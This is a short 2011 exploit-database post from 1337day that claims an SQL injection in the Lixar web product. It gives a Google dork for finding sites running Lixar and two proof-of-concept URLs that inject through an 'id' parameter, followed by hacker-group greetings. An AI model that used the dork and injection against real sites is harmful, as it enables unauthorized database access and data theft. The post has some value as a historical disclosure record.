Lixar suffers from a remote SQL injection vulnerability.
c38756998752f6b74f15f91bdd60cb7959ebf595d0f6bfe9bb87460099174c67
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm kalashinkov3 member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Info================================================================
[-] Title : Lixar SQL Injection Vulnerability
[-] Author: Kalashinkov3
[-] Home : ALGERIA / 13000
[-] Website : 1337day.com
[-] Vendor: www.lixar.com
[-] Email : kalashinkov3[at]Hotmail[dot]Fr / kalashinkov3[at]1337day[dot]com
[-] Date : 31/12/2011
[-] Google Dork : Powered by Lixar
[-] Category : webapps / 0day
[-] Special Thanks : -> KedAns-Dz, Caddy-Dz, KnocKout, DZ Ghost Team<-
[+] Exploit===============================================================
[-] SQL-i :)
# http://[localhost]/*.php?id=1'
# http://[localhost]/*.php?id=[SQLi]
^_^ G00d LUCK ALL :=) # http://www.facebook.com/ALG.Cyber.Army #
[+] Greets===================================================================+
+
BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, Rizky Ariestiyansyah, Over-x +
Keinji1258, 1337day.com, packetstormsecurity.org, Exploit-id.com, +
DZ Ghost Team, 1337day.com/team, id-backtrack.com, dofus-exploit.com +
all Algerians Hacker'S ;), All My Friends +
( I Love You Lila ) +
+
=============================================================================+
# 1337day.com [2011-10-09]